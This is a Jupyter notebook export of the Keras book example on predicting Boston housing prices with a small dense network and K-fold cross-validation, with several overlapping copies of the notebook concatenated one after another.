Let's plot this:
###Code
import matplotlib.pyplot as plt
plt.plot(range(1, len(average_mae_history) + 1), average_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
It may be a bit hard to see the plot due to scaling issues and relatively high variance. Let's:* Omit the first 10 data points, which are on a different scale from the rest of the curve.* Replace each point with an exponential moving average of the previous points, to obtain a smooth curve.
###Code
def smooth_curve(points, factor=0.9):
smoothed_points = []
for point in points:
if smoothed_points:
previous = smoothed_points[-1]
smoothed_points.append(previous * factor + point * (1 - factor))
else:
smoothed_points.append(point)
return smoothed_points
smooth_mae_history = smooth_curve(average_mae_history[10:])
plt.plot(range(1, len(smooth_mae_history) + 1), smooth_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
According to this plot, it seems that validation MAE stops improving significantly after 80 epochs. Past that point, we start overfitting.Once we are done tuning other parameters of our model (besides the number of epochs, we could also adjust the size of the hidden layers), we can train a final "production" model on all of the training data, with the best parameters, then look at its performance on the test data:
###Code
# Get a fresh, compiled model.
model = build_model()
# Train it on the entirety of the data.
model.fit(train_data, train_targets,
epochs=80, batch_size=16, verbose=0)
test_mse_score, test_mae_score = model.evaluate(test_data, test_targets)
test_mae_score
###Output
_____no_output_____
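###Markdown
With the final model trained, producing actual price predictions is a one-line call; a short sketch (the outputs are in thousands of dollars, like the targets):
###Code
predictions = model.predict(test_data)
print(predictions[:5].ravel())   # first few predicted prices
print(test_targets[:5])          # corresponding true prices for comparison
###Output
_____no_output_____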
###Markdown
Predicting house prices: a regression exampleThis notebook contains the code samples found in Chapter 3, Section 6 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments.----In our two previous examples, we were considering classification problems, where the goal was to predict a single discrete label of an input data point. Another common type of machine learning problem is "regression", which consists of predicting a continuous value instead of a discrete label. For instance, predicting the temperature tomorrow, given meteorological data, or predicting the time that a software project will take to complete, given its specifications.Do not mix up "regression" with the algorithm "logistic regression": confusingly, "logistic regression" is not a regression algorithm, it is a classification algorithm. The Boston Housing Price datasetWe will be attempting to predict the median price of homes in a given Boston suburb in the mid-1970s, given a few data points about the suburb at the time, such as the crime rate, the local property tax rate, etc.The dataset we will be using has another interesting difference from our two previous examples: it has very few data points, only 506 in total, split between 404 training samples and 102 test samples, and each "feature" in the input data (e.g. the crime rate is a feature) has a different scale. For instance some values are proportions, which take a values between 0 and 1, others take values between 1 and 12, others between 0 and 100...Let's take a look at the data:
###Code
from keras.datasets import boston_housing
(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()
train_data.shape
test_data.shape
###Output
_____no_output_____
###Markdown
As you can see, we have 404 training samples and 102 test samples. The data comprises 13 features. The 13 features in the input data are as follow:1. Per capita crime rate.2. Proportion of residential land zoned for lots over 25,000 square feet.3. Proportion of non-retail business acres per town.4. Charles River dummy variable (= 1 if tract bounds river; 0 otherwise).5. Nitric oxides concentration (parts per 10 million).6. Average number of rooms per dwelling.7. Proportion of owner-occupied units built prior to 1940.8. Weighted distances to five Boston employment centres.9. Index of accessibility to radial highways.10. Full-value property-tax rate per $10,000.11. Pupil-teacher ratio by town.12. 1000 * (Bk - 0.63) ** 2 where Bk is the proportion of Black people by town.13. % lower status of the population.The targets are the median values of owner-occupied homes, in thousands of dollars:
###Code
train_targets
###Output
_____no_output_____
###Markdown
The prices are typically between \$10,000 and \$50,000. If that sounds cheap, remember this was the mid-1970s, and these prices are not inflation-adjusted. Preparing the dataIt would be problematic to feed into a neural network values that all take wildly different ranges. The network might be able to automatically adapt to such heterogeneous data, but it would definitely make learning more difficult. A widespread best practice to deal with such data is to do feature-wise normalization: for each feature in the input data (a column in the input data matrix), we will subtract the mean of the feature and divide by the standard deviation, so that the feature will be centered around 0 and will have a unit standard deviation. This is easily done in Numpy:
###Code
mean = train_data.mean(axis=0)
train_data -= mean
std = train_data.std(axis=0)
train_data /= std
test_data -= mean
test_data /= std
###Output
_____no_output_____
###Markdown
Note that the quantities that we use for normalizing the test data have been computed using the training data. We should never use in our workflow any quantity computed on the test data, even for something as simple as data normalization. Building our networkBecause so few samples are available, we will be using a very small network with two hidden layers, each with 64 units. In general, the less training data you have, the worse overfitting will be, and using a small network is one way to mitigate overfitting.
###Code
from keras import models
from keras import layers
def build_model():
# Because we will need to instantiate
# the same model multiple times,
# we use a function to construct it.
model = models.Sequential()
model.add(layers.Dense(64, activation='relu',
input_shape=(train_data.shape[1],)))
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(1))
model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])
return model
###Output
_____no_output_____
###Markdown
Our network ends with a single unit, and no activation (i.e. it will be linear layer). This is a typical setup for scalar regression (i.e. regression where we are trying to predict a single continuous value). Applying an activation function would constrain the range that the output can take; for instance if we applied a `sigmoid` activation function to our last layer, the network could only learn to predict values between 0 and 1. Here, because the last layer is purely linear, the network is free to learn to predict values in any range.Note that we are compiling the network with the `mse` loss function -- Mean Squared Error, the square of the difference between the predictions and the targets, a widely used loss function for regression problems.We are also monitoring a new metric during training: `mae`. This stands for Mean Absolute Error. It is simply the absolute value of the difference between the predictions and the targets. For instance, a MAE of 0.5 on this problem would mean that our predictions are off by \$500 on average. Validating our approach using K-fold validationTo evaluate our network while we keep adjusting its parameters (such as the number of epochs used for training), we could simply split the data into a training set and a validation set, as we were doing in our previous examples. However, because we have so few data points, the validation set would end up being very small (e.g. about 100 examples). A consequence is that our validation scores may change a lot depending on _which_ data points we choose to use for validation and which we choose for training, i.e. the validation scores may have a high _variance_ with regard to the validation split. This would prevent us from reliably evaluating our model.The best practice in such situations is to use K-fold cross-validation. It consists of splitting the available data into K partitions (typically K=4 or 5), then instantiating K identical models, and training each one on K-1 partitions while evaluating on the remaining partition. The validation score for the model used would then be the average of the K validation scores obtained. In terms of code, this is straightforward:
###Code
import numpy as np
k = 4
num_val_samples = len(train_data) // k
num_epochs = 100
all_scores = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
model.fit(partial_train_data, partial_train_targets,
epochs=num_epochs, batch_size=1, verbose=0)
# Evaluate the model on the validation data
val_mse, val_mae = model.evaluate(val_data, val_targets, verbose=0)
all_scores.append(val_mae)
all_scores
np.mean(all_scores)
###Output
_____no_output_____
###Markdown
As you can notice, the different runs do indeed show rather different validation scores, from 2.1 to 2.9. Their average (2.4) is a much more reliable metric than any single of these scores -- that's the entire point of K-fold cross-validation. In this case, we are off by \$2,400 on average, which is still significant considering that the prices range from \$10,000 to \$50,000. Let's try training the network for a bit longer: 500 epochs. To keep a record of how well the model did at each epoch, we will modify our training loop to save the per-epoch validation score log:
###Code
from keras import backend as K
# Some memory clean-up
K.clear_session()
num_epochs = 500
all_mae_histories = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
history = model.fit(partial_train_data, partial_train_targets,
validation_data=(val_data, val_targets),
epochs=num_epochs, batch_size=1, verbose=0)
mae_history = history.history['val_mean_absolute_error']
all_mae_histories.append(mae_history)
###Output
processing fold # 0
processing fold # 1
processing fold # 2
processing fold # 3
###Markdown
We can then compute the average of the per-epoch MAE scores for all folds:
###Code
average_mae_history = [
np.mean([x[i] for x in all_mae_histories]) for i in range(num_epochs)]
###Output
_____no_output_____
###Markdown
Let's plot this:
###Code
import matplotlib.pyplot as plt
plt.plot(range(1, len(average_mae_history) + 1), average_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
It may be a bit hard to see the plot due to scaling issues and relatively high variance. Let's:* Omit the first 10 data points, which are on a different scale from the rest of the curve.* Replace each point with an exponential moving average of the previous points, to obtain a smooth curve.
###Code
def smooth_curve(points, factor=0.9):
smoothed_points = []
for point in points:
if smoothed_points:
previous = smoothed_points[-1]
smoothed_points.append(previous * factor + point * (1 - factor))
else:
smoothed_points.append(point)
return smoothed_points
smooth_mae_history = smooth_curve(average_mae_history[10:])
plt.plot(range(1, len(smooth_mae_history) + 1), smooth_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
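###Markdown
Rather than reading the best epoch off the plot, it can be computed directly from the smoothed history; a sketch (the first 10 epochs were dropped before smoothing, so the index is offset by 10):
###Code
best_epoch = np.argmin(smooth_mae_history) + 10 + 1   # +10 for the omitted points, +1 for 1-based epochs
print('Lowest smoothed validation MAE around epoch', best_epoch)
###Output
_____no_output_____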
###Markdown
According to this plot, it seems that validation MAE stops improving significantly after 80 epochs. Past that point, we start overfitting.Once we are done tuning other parameters of our model (besides the number of epochs, we could also adjust the size of the hidden layers), we can train a final "production" model on all of the training data, with the best parameters, then look at its performance on the test data:
###Code
# Get a fresh, compiled model.
model = build_model()
# Train it on the entirety of the data.
model.fit(train_data, train_targets,
epochs=80, batch_size=16, verbose=0)
test_mse_score, test_mae_score = model.evaluate(test_data, test_targets)
test_mae_score
###Output
_____no_output_____
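###Markdown
If this final model is worth keeping, it can be saved to disk and reloaded later; a minimal sketch (the filename is arbitrary):
###Code
from keras.models import load_model
model.save('boston_housing_model.h5')              # architecture + weights + optimizer state
restored = load_model('boston_housing_model.h5')
restored.evaluate(test_data, test_targets, verbose=0)
###Output
_____no_output_____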
###Markdown
Predicting house prices: a regression exampleThis notebook contains the code samples found in Chapter 3, Section 6 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments.----In our two previous examples, we were considering classification problems, where the goal was to predict a single discrete label of an input data point. Another common type of machine learning problem is "regression", which consists of predicting a continuous value instead of a discrete label. For instance, predicting the temperature tomorrow, given meteorological data, or predicting the time that a software project will take to complete, given its specifications.Do not mix up "regression" with the algorithm "logistic regression": confusingly, "logistic regression" is not a regression algorithm, it is a classification algorithm. The Boston Housing Price datasetWe will be attempting to predict the median price of homes in a given Boston suburb in the mid-1970s, given a few data points about the suburb at the time, such as the crime rate, the local property tax rate, etc.The dataset we will be using has another interesting difference from our two previous examples: it has very few data points, only 506 in total, split between 404 training samples and 102 test samples, and each "feature" in the input data (e.g. the crime rate is a feature) has a different scale. For instance some values are proportions, which take a values between 0 and 1, others take values between 1 and 12, others between 0 and 100...Let's take a look at the data:
###Code
from keras.datasets import boston_housing
(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()
train_data.shape
test_data.shape
###Output
_____no_output_____
###Markdown
As you can see, we have 404 training samples and 102 test samples. The data comprises 13 features. The 13 features in the input data are as follow:1. Per capita crime rate.2. Proportion of residential land zoned for lots over 25,000 square feet.3. Proportion of non-retail business acres per town.4. Charles River dummy variable (= 1 if tract bounds river; 0 otherwise).5. Nitric oxides concentration (parts per 10 million).6. Average number of rooms per dwelling.7. Proportion of owner-occupied units built prior to 1940.8. Weighted distances to five Boston employment centres.9. Index of accessibility to radial highways.10. Full-value property-tax rate per $10,000.11. Pupil-teacher ratio by town.12. 1000 * (Bk - 0.63) ** 2 where Bk is the proportion of Black people by town.13. % lower status of the population.The targets are the median values of owner-occupied homes, in thousands of dollars:
###Code
train_targets
###Output
_____no_output_____
###Markdown
The prices are typically between \$10,000 and \$50,000. If that sounds cheap, remember this was the mid-1970s, and these prices are not inflation-adjusted. Preparing the dataIt would be problematic to feed into a neural network values that all take wildly different ranges. The network might be able to automatically adapt to such heterogeneous data, but it would definitely make learning more difficult. A widespread best practice to deal with such data is to do feature-wise normalization: for each feature in the input data (a column in the input data matrix), we will subtract the mean of the feature and divide by the standard deviation, so that the feature will be centered around 0 and will have a unit standard deviation. This is easily done in Numpy:
###Code
mean = train_data.mean(axis=0)
train_data -= mean
std = train_data.std(axis=0)
train_data /= std
test_data -= mean
test_data /= std
###Output
_____no_output_____
###Markdown
Note that the quantities that we use for normalizing the test data have been computed using the training data. We should never use in our workflow any quantity computed on the test data, even for something as simple as data normalization. Building our networkBecause so few samples are available, we will be using a very small network with two hidden layers, each with 64 units. In general, the less training data you have, the worse overfitting will be, and using a small network is one way to mitigate overfitting.
###Code
from keras import models
from keras import layers
def build_model():
# Because we will need to instantiate
# the same model multiple times,
# we use a function to construct it.
model = models.Sequential()
model.add(layers.Dense(64, activation='relu',
input_shape=(train_data.shape[1],)))
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(1))
model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])
return model
###Output
_____no_output_____
###Markdown
Our network ends with a single unit, and no activation (i.e. it will be linear layer). This is a typical setup for scalar regression (i.e. regression where we are trying to predict a single continuous value). Applying an activation function would constrain the range that the output can take; for instance if we applied a `sigmoid` activation function to our last layer, the network could only learn to predict values between 0 and 1. Here, because the last layer is purely linear, the network is free to learn to predict values in any range.Note that we are compiling the network with the `mse` loss function -- Mean Squared Error, the square of the difference between the predictions and the targets, a widely used loss function for regression problems.We are also monitoring a new metric during training: `mae`. This stands for Mean Absolute Error. It is simply the absolute value of the difference between the predictions and the targets. For instance, a MAE of 0.5 on this problem would mean that our predictions are off by \$500 on average. Validating our approach using K-fold validationTo evaluate our network while we keep adjusting its parameters (such as the number of epochs used for training), we could simply split the data into a training set and a validation set, as we were doing in our previous examples. However, because we have so few data points, the validation set would end up being very small (e.g. about 100 examples). A consequence is that our validation scores may change a lot depending on _which_ data points we choose to use for validation and which we choose for training, i.e. the validation scores may have a high _variance_ with regard to the validation split. This would prevent us from reliably evaluating our model.The best practice in such situations is to use K-fold cross-validation. It consists of splitting the available data into K partitions (typically K=4 or 5), then instantiating K identical models, and training each one on K-1 partitions while evaluating on the remaining partition. The validation score for the model used would then be the average of the K validation scores obtained. In terms of code, this is straightforward:
###Code
import numpy as np
k = 4
num_val_samples = len(train_data) // k
num_epochs = 100
all_scores = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
model.fit(partial_train_data, partial_train_targets,
epochs=num_epochs, batch_size=1, verbose=0)
# Evaluate the model on the validation data
val_mse, val_mae = model.evaluate(val_data, val_targets, verbose=0)
all_scores.append(val_mae)
all_scores
np.mean(all_scores)
###Output
_____no_output_____
###Markdown
As you can notice, the different runs do indeed show rather different validation scores, from 2.1 to 2.9. Their average (2.4) is a much more reliable metric than any single of these scores -- that's the entire point of K-fold cross-validation. In this case, we are off by \$2,400 on average, which is still significant considering that the prices range from \$10,000 to \$50,000. Let's try training the network for a bit longer: 500 epochs. To keep a record of how well the model did at each epoch, we will modify our training loop to save the per-epoch validation score log:
###Code
from keras import backend as K
# Some memory clean-up
K.clear_session()
num_epochs = 500
all_mae_histories = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
history = model.fit(partial_train_data, partial_train_targets,
validation_data=(val_data, val_targets),
epochs=num_epochs, batch_size=1, verbose=0)
mae_history = history.history['val_mae']
all_mae_histories.append(mae_history)
history_dict = history.history
history_dict.keys()
###Output
_____no_output_____
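###Markdown
The validation-MAE key differs across Keras versions ('val_mean_absolute_error' in older releases, 'val_mae' in newer ones), which is why inspecting `history.history.keys()` above is worthwhile. A defensive sketch that works with either name:
###Code
val_mae_key = next(name for name in history.history
                   if name in ('val_mae', 'val_mean_absolute_error'))
mae_history = history.history[val_mae_key]
###Output
_____no_output_____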
###Markdown
We can then compute the average of the per-epoch MAE scores for all folds:
###Code
average_mae_history = [
np.mean([x[i] for x in all_mae_histories]) for i in range(num_epochs)]
###Output
_____no_output_____
###Markdown
Let's plot this:
###Code
import matplotlib.pyplot as plt
plt.plot(range(1, len(average_mae_history) + 1), average_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
It may be a bit hard to see the plot due to scaling issues and relatively high variance. Let's:* Omit the first 10 data points, which are on a different scale from the rest of the curve.* Replace each point with an exponential moving average of the previous points, to obtain a smooth curve.
###Code
def smooth_curve(points, factor=0.9):
smoothed_points = []
for point in points:
if smoothed_points:
previous = smoothed_points[-1]
smoothed_points.append(previous * factor + point * (1 - factor))
else:
smoothed_points.append(point)
return smoothed_points
smooth_mae_history = smooth_curve(average_mae_history[10:])
plt.plot(range(1, len(smooth_mae_history) + 1), smooth_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
# Calculation of the minimum average MAE in the history
# (note: the %d format truncates the MAE to a whole number of thousands of dollars)
best_avg_mae = min(average_mae_history)
print('The minimum average MAE is: %d \nIt is located at the index: %d'
      % (best_avg_mae, average_mae_history.index(best_avg_mae)))
###Output
The minimum average MAE is: 2
It is located at the index: 54
###Markdown
According to this plot, it seems that validation MAE stops improving significantly after 80 epochs. Past that point, we start overfitting.Once we are done tuning other parameters of our model (besides the number of epochs, we could also adjust the size of the hidden layers), we can train a final "production" model on all of the training data, with the best parameters, then look at its performance on the test data:
###Code
# Get a fresh, compiled model.
model = build_model()
# Train it on the entirety of the data.
model.fit(train_data, train_targets,
epochs=80, batch_size=16, verbose=0)
test_mse_score, test_mae_score = model.evaluate(test_data, test_targets)
test_mae_score
###Output
_____no_output_____
###Markdown
Predicting house prices: a regression exampleThis notebook contains the code samples found in Chapter 3, Section 6 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments.----In our two previous examples, we were considering classification problems, where the goal was to predict a single discrete label of an input data point. Another common type of machine learning problem is "regression", which consists of predicting a continuous value instead of a discrete label. For instance, predicting the temperature tomorrow, given meteorological data, or predicting the time that a software project will take to complete, given its specifications.Do not mix up "regression" with the algorithm "logistic regression": confusingly, "logistic regression" is not a regression algorithm, it is a classification algorithm. The Boston Housing Price datasetWe will be attempting to predict the median price of homes in a given Boston suburb in the mid-1970s, given a few data points about the suburb at the time, such as the crime rate, the local property tax rate, etc.The dataset we will be using has another interesting difference from our two previous examples: it has very few data points, only 506 in total, split between 404 training samples and 102 test samples, and each "feature" in the input data (e.g. the crime rate is a feature) has a different scale. For instance some values are proportions, which take a values between 0 and 1, others take values between 1 and 12, others between 0 and 100...Let's take a look at the data:
###Code
from keras.datasets import boston_housing
(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()
train_data.shape
test_data.shape
###Output
_____no_output_____
###Markdown
As you can see, we have 404 training samples and 102 test samples. The data comprises 13 features. The 13 features in the input data are as follow:1. Per capita crime rate.2. Proportion of residential land zoned for lots over 25,000 square feet.3. Proportion of non-retail business acres per town.4. Charles River dummy variable (= 1 if tract bounds river; 0 otherwise).5. Nitric oxides concentration (parts per 10 million).6. Average number of rooms per dwelling.7. Proportion of owner-occupied units built prior to 1940.8. Weighted distances to five Boston employment centres.9. Index of accessibility to radial highways.10. Full-value property-tax rate per $10,000.11. Pupil-teacher ratio by town.12. 1000 * (Bk - 0.63) ** 2 where Bk is the proportion of Black people by town.13. % lower status of the population.The targets are the median values of owner-occupied homes, in thousands of dollars:
###Code
train_targets
###Output
_____no_output_____
###Markdown
The prices are typically between \$10,000 and \$50,000. If that sounds cheap, remember this was the mid-1970s, and these prices are not inflation-adjusted. Preparing the dataIt would be problematic to feed into a neural network values that all take wildly different ranges. The network might be able to automatically adapt to such heterogeneous data, but it would definitely make learning more difficult. A widespread best practice to deal with such data is to do feature-wise normalization: for each feature in the input data (a column in the input data matrix), we will subtract the mean of the feature and divide by the standard deviation, so that the feature will be centered around 0 and will have a unit standard deviation. This is easily done in Numpy:
###Code
mean = train_data.mean(axis=0)
train_data -= mean
std = train_data.std(axis=0)
train_data /= std
test_data -= mean
test_data /= std
###Output
_____no_output_____
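###Markdown
A quick check that the scaling behaved as intended (a small sketch): the training features should now have roughly zero mean and unit standard deviation, while the test features will only be close to that, since they were scaled with the training statistics.
###Code
print(train_data.mean(axis=0).round(6))   # ~0 for every feature
print(train_data.std(axis=0).round(6))    # ~1 for every feature
print(test_data.mean(axis=0).round(2))    # near, but not exactly, 0 by design
###Output
_____no_output_____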
###Markdown
Note that the quantities that we use for normalizing the test data have been computed using the training data. We should never use in our workflow any quantity computed on the test data, even for something as simple as data normalization. Building our networkBecause so few samples are available, we will be using a very small network with two hidden layers, each with 64 units. In general, the less training data you have, the worse overfitting will be, and using a small network is one way to mitigate overfitting.
###Code
from keras import models
from keras import layers
def build_model():
# Because we will need to instantiate
# the same model multiple times,
# we use a function to construct it.
model = models.Sequential()
model.add(layers.Dense(64, activation='relu',
input_shape=(train_data.shape[1],)))
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(1))
model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])
return model
###Output
_____no_output_____
###Markdown
Our network ends with a single unit, and no activation (i.e. it will be linear layer). This is a typical setup for scalar regression (i.e. regression where we are trying to predict a single continuous value). Applying an activation function would constrain the range that the output can take; for instance if we applied a `sigmoid` activation function to our last layer, the network could only learn to predict values between 0 and 1. Here, because the last layer is purely linear, the network is free to learn to predict values in any range.Note that we are compiling the network with the `mse` loss function -- Mean Squared Error, the square of the difference between the predictions and the targets, a widely used loss function for regression problems.We are also monitoring a new metric during training: `mae`. This stands for Mean Absolute Error. It is simply the absolute value of the difference between the predictions and the targets. For instance, a MAE of 0.5 on this problem would mean that our predictions are off by \$500 on average. Validating our approach using K-fold validationTo evaluate our network while we keep adjusting its parameters (such as the number of epochs used for training), we could simply split the data into a training set and a validation set, as we were doing in our previous examples. However, because we have so few data points, the validation set would end up being very small (e.g. about 100 examples). A consequence is that our validation scores may change a lot depending on _which_ data points we choose to use for validation and which we choose for training, i.e. the validation scores may have a high _variance_ with regard to the validation split. This would prevent us from reliably evaluating our model.The best practice in such situations is to use K-fold cross-validation. It consists of splitting the available data into K partitions (typically K=4 or 5), then instantiating K identical models, and training each one on K-1 partitions while evaluating on the remaining partition. The validation score for the model used would then be the average of the K validation scores obtained. In terms of code, this is straightforward:
###Code
import numpy as np
k = 4
num_val_samples = len(train_data) // k
num_epochs = 100
all_scores = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
model.fit(partial_train_data, partial_train_targets,
epochs=num_epochs, batch_size=1, verbose=0)
# Evaluate the model on the validation data
val_mse, val_mae = model.evaluate(val_data, val_targets, verbose=0)
all_scores.append(val_mae)
all_scores
np.mean(all_scores)
###Output
_____no_output_____
###Markdown
As you can notice, the different runs do indeed show rather different validation scores, from 2.1 to 2.9. Their average (2.4) is a much more reliable metric than any single of these scores -- that's the entire point of K-fold cross-validation. In this case, we are off by \$2,400 on average, which is still significant considering that the prices range from \$10,000 to \$50,000. Let's try training the network for a bit longer: 500 epochs. To keep a record of how well the model did at each epoch, we will modify our training loop to save the per-epoch validation score log:
###Code
from keras import backend as K
# Some memory clean-up
K.clear_session()
num_epochs = 500
all_mae_histories = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
history = model.fit(partial_train_data, partial_train_targets,
validation_data=(val_data, val_targets),
epochs=num_epochs, batch_size=1, verbose=0)
mae_history = history.history['val_mean_absolute_error']
all_mae_histories.append(mae_history)
###Output
processing fold # 0
processing fold # 1
processing fold # 2
processing fold # 3
###Markdown
We can then compute the average of the per-epoch MAE scores for all folds:
###Code
average_mae_history = [
np.mean([x[i] for x in all_mae_histories]) for i in range(num_epochs)]
###Output
_____no_output_____
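###Markdown
Equivalently, since every fold records the same number of epochs, the per-epoch average can be computed in a single call with Numpy:
###Code
# Stack the k per-fold MAE histories and average them epoch-wise.
average_mae_history = np.mean(all_mae_histories, axis=0)
###Output
_____no_output_____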
###Markdown
Let's plot this:
###Code
import matplotlib.pyplot as plt
plt.plot(range(1, len(average_mae_history) + 1), average_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
It may be a bit hard to see the plot due to scaling issues and relatively high variance. Let's:* Omit the first 10 data points, which are on a different scale from the rest of the curve.* Replace each point with an exponential moving average of the previous points, to obtain a smooth curve.
###Code
def smooth_curve(points, factor=0.9):
smoothed_points = []
for point in points:
if smoothed_points:
previous = smoothed_points[-1]
smoothed_points.append(previous * factor + point * (1 - factor))
else:
smoothed_points.append(point)
return smoothed_points
smooth_mae_history = smooth_curve(average_mae_history[10:])
plt.plot(range(1, len(smooth_mae_history) + 1), smooth_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
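###Markdown
For reference, the same exponential moving average (factor 0.9) can be obtained with pandas, if it is available; this is just an equivalent sketch of `smooth_curve`, not a change to the approach:
###Code
import pandas as pd

# ewm with alpha = 1 - factor and adjust=False reproduces the recursion
# smoothed[t] = 0.9 * smoothed[t - 1] + 0.1 * point[t], starting from the first point.
smooth_mae_history = pd.Series(average_mae_history[10:]).ewm(alpha=0.1, adjust=False).mean().tolist()
###Output
_____no_output_____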
###Markdown
According to this plot, it seems that validation MAE stops improving significantly after 80 epochs. Past that point, we start overfitting.Once we are done tuning other parameters of our model (besides the number of epochs, we could also adjust the size of the hidden layers), we can train a final "production" model on all of the training data, with the best parameters, then look at its performance on the test data:
###Code
# Get a fresh, compiled model.
model = build_model()
# Train it on the entirety of the data.
model.fit(train_data, train_targets,
epochs=80, batch_size=16, verbose=0)
test_mse_score, test_mae_score = model.evaluate(test_data, test_targets)
test_mae_score
###Output
_____no_output_____
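###Markdown
With the final model trained, generating actual price predictions is a single call; a minimal sketch using the `model` fitted above (values are in the same units as the targets, i.e. thousands of dollars):
###Code
predictions = model.predict(test_data)
# Predicted median home price for the first test suburb, in thousands of dollars.
print(predictions[0])
###Output
_____no_output_____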
###Markdown
Predicting house prices: a regression exampleThis notebook contains the code samples found in Chapter 3, Section 6 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments.----In our two previous examples, we were considering classification problems, where the goal was to predict a single discrete label of an input data point. Another common type of machine learning problem is "regression", which consists of predicting a continuous value instead of a discrete label. For instance, predicting the temperature tomorrow, given meteorological data, or predicting the time that a software project will take to complete, given its specifications.Do not mix up "regression" with the algorithm "logistic regression": confusingly, "logistic regression" is not a regression algorithm, it is a classification algorithm. The Boston Housing Price datasetWe will be attempting to predict the median price of homes in a given Boston suburb in the mid-1970s, given a few data points about the suburb at the time, such as the crime rate, the local property tax rate, etc.The dataset we will be using has another interesting difference from our two previous examples: it has very few data points, only 506 in total, split between 404 training samples and 102 test samples, and each "feature" in the input data (e.g. the crime rate is a feature) has a different scale. For instance some values are proportions, which take a values between 0 and 1, others take values between 1 and 12, others between 0 and 100...Let's take a look at the data:
###Code
from keras.datasets import boston_housing
(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()
train_data.shape
test_data.shape
###Output
_____no_output_____
###Markdown
